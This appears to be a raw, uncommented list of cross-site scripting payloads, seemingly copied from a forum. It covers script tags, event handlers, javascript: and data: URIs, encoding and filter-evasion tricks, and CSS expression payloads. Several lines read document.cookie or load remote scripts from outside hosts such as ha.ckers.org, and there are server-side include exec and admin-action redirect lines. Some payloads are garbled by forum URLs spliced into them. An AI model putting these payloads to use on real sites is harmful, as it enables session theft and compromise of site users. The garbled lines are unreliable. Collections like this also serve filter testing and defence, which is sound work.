<? foo=">&lt;script&gt;alert(1)&lt;script&gt;">
<! foo=">&lt;script&gt;alert(1)&lt;script&gt;">
</ foo=">&lt;script&gt;alert(1)&lt;script&gt;">
&lt;script&gt;({0:#0=alert/#0#/#0#(123)})&lt;script&gt;
&lt;script&gt;ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x&lt;script&gt;
&lt;script&gt;Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()&lt;script&gt;
<script src="#">{alert(1)}&lt;script&gt;;1
&lt;script&gt;crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')&lt;script&gt;
<svg https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xmlns="#">&lt;script&gt;alert(1)&lt;script&gt;</svg>
<svg https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xmlns="#"></svg>
<iframe https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xmlns="#" src="javascript:alert(1)"></iframe>
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
%253cscript%253ealert(document.cookie)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)&lt;script&gt;
“>&lt;script&gt;alert(document.cookie)&lt;script&gt;
“><&lt;script&gt;alert(document.cookie);//<&lt;script&gt;
foo&lt;script&gt;alert(document.cookie)&lt;script&gt;
<scr&lt;script&gt;ipt>alert(document.cookie)</scr&lt;script&gt;ipt>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.bohttps://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/x.com/https://forum11.djicdn.com/data/attachment/forum/https://forum11.djicdn.com/data/attachment/forum/xss.js%3E%3C/script%3E%22)’%3E
‘; alert(document.cookie); var foo=’
foo\’; alert(document.cookie);//’;
&lt;script&gt;<script >alert(document.cookie)&lt;script&gt;
<img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert(’XSS’)>
&lt;script&gt;alert(1)&lt;script&gt;
">&lt;script&gt;alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))&lt;script&gt;
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>



<script>alert(123);</script>
<ScRipT>alert("XSS");</ScRipT>
<script>alert(123)</script>
<script>alert("hellox worldss");</script>
<script>alert(“XSS”)</script>
<script>alert(“XSS”);</script>
<script>alert(‘XSS’)</script>
“><script>alert(“XSS”)</script>
<script>alert(/XSS”)</script>
<script>alert(/XSS/)</script>
</script><script>alert(1)</script>
‘; alert(1);
‘)alert(1);//
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert(‘XSS’)>
<IMG SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=javascript:alert(‘XSS’)>     
<img src=xss onerror=alert(1)>


<iframe src="&Tab;javascript:prompt(1)&Tab;">

<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'

<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"

<sVg><scRipt >alert&lpar;1&rpar; {Opera}

<img/src=`` onerror=this.onerror=confirm(1)

<form><isindex formaction="javascript&colon;confirm(1)"

<img src=``&NewLine; onerror=alert(1)&NewLine;

<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>

<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

<script /**/>/**/alert(1)/**/</script /**/

&#34;&#62;<h1/onmouseover='\u0061lert(1)'>

<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">

<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>

<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script

<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>

<form><a href="javascript:\u0061lert&#x28;1&#x29;">X

</script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>
<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>

<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a

http://www.google<script .com>alert(document.location)</script

<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a

<img/src=@&#32;&#13; onerror = prompt('&#49;')

<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;

<script ^__^>alert(String.fromCharCode(49))</script ^__^

</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(

&#00;</form><input type&#61;"date" onfocus="alert(1)">

<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>

<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>

<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>

<script ~~~>alert(0%0)</script ~~~>

<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>

<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN

<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)

&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^

<div/style="width:expression(confirm(1))">X</div> {IE7}

<iframe// src=javaSCRIPT&colon;alert(1)

//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//

/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>

<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">

</plaintext\></|\><plaintext/onmouseover=prompt(1)

</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}

<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>

<div onmouseover='alert&lpar;1&rpar;'>DIV</div>

<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>

<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

<var onmouseover="prompt(1)">On Mouse Over</var>

<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>

<img src="/" =_=" title="onerror='prompt(1)'">

<%<!--'%><script>alert(1);</script -->

<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)

<iframe/onreadystatechange=alert(1)

<svg/onload=alert(1)

<input value=<><iframe/src=javascript:confirm(1)

<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>

http://www.<script>alert(1)</script .com

<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>

<svg><script ?>alert(1)

<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>

<img src=`xx:xx`onerror=alert(1)>

<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click

<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1

<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a

<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script

<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>

<script>+-+-1-+-+alert(1)</script>

<body/onload=&lt;!--&gt;&#10alert(1)>

<script itworksinallbrowsers>/*<script* */alert(1)</script

<img src ?itworksonchrome?\/onerror = alert(1)

<svg><script>//&NewLine;confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

<script x> alert(1) </script 1=2

<div/onmouseover='alert(1)'> style="x:">

<--`<img/src=` onerror=alert(1)> --!>
 <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>

<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>

"><img src=x onerror=window.open('https://www.google.com/');>

<form><button formaction=javascript&colon;alert(1)>CLICKME

<math><a xlink:href="//jsfiddle.net/t846h/">click

<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>

<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=”jav ascript:alert(‘XSS’);”>
<IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
%253cscript%253ealert(1)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
foo<script>alert(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
<BODY ONLOAD=alert(‘XSS’)>
<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=”javascript:alert(‘XSS’)”
<iframe src=http://ha.ckers.org/scriptlet.html <
javascript:alert("hellox worldss")
<img src="javascript:alert('XSS');">
<img src=javascript:alert(&quot;XSS&quot;)>
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
<script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
<script>alert("XSS");</script>&search=1
0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
<h1><font color=blue>hellox worldss</h1>
<BODY ONLOAD=alert('hellox worldss')>
<input onfocus=write(XSS) autofocus>
<input onblur=write(XSS) autofocus><input autofocus>
<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form><button formaction="javascript:alert(XSS)">lol
<!--<img src="--><img src=x onerror=alert(XSS)//">
<![><img src="]><img src=x onerror=alert(XSS)//">
<style><img src="</style><img src=x onerror=alert(XSS)//">
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<? foo="><x foo='?><script>alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
<% foo><x foo="%><script>alert(123)</script>">
<div style="font-family:'foo&#10;;color:red;';">LOL
LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
<script>({0:#0=alert/#0#/#0#(0)})</script>
<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
&lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;
\\";alert('XSS');//
&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt;
&lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt;
&lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
&lt;BODY ONLOAD=alert('XSS')&gt;
&lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt;
&lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt;
&lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt;
&lt;BR SIZE=\"&{alert('XSS')}\"&gt;
&lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt;
&lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt;
&lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt;
&lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt;
&lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt;
&lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt;
&lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt;
&lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
&lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt;
&lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt;
&lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"&gt;
žscriptualert(EXSSE)ž/scriptu
&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt;
&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt;
&lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\"
&lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt;
&lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt;
&lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
&lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
&lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt;
&lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
&lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt;
&lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt;
&lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt;
&lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt;
exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\");
xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt;
&lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt;
&lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
&lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt;
&lt;!--&#91;if gte IE 4&#93;&gt;
&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
&lt;!&#91;endif&#93;--&gt;
&lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt;
&lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt;
&lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt;
&lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
&lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
a=\"get\";
b=\"URL(\\"\";
c=\"javascript&#058;\";
d=\"alert('XSS');\\")\";
eval(a+b+c+d);
&lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;
&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt;
&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
&lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
&lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt;
&lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt;
&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
&lt;HTML&gt;&lt;BODY&gt;
&lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt;
&lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt;
&lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt;
&lt;/BODY&gt;&lt;/HTML&gt;
&lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt;
&lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt;
&lt;? echo('&lt;SCR)';
echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt;
&lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt;
Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser
&lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt;
&lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
&lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
&lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt;
&lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt;
&lt;
%3C
&lt
&lt;
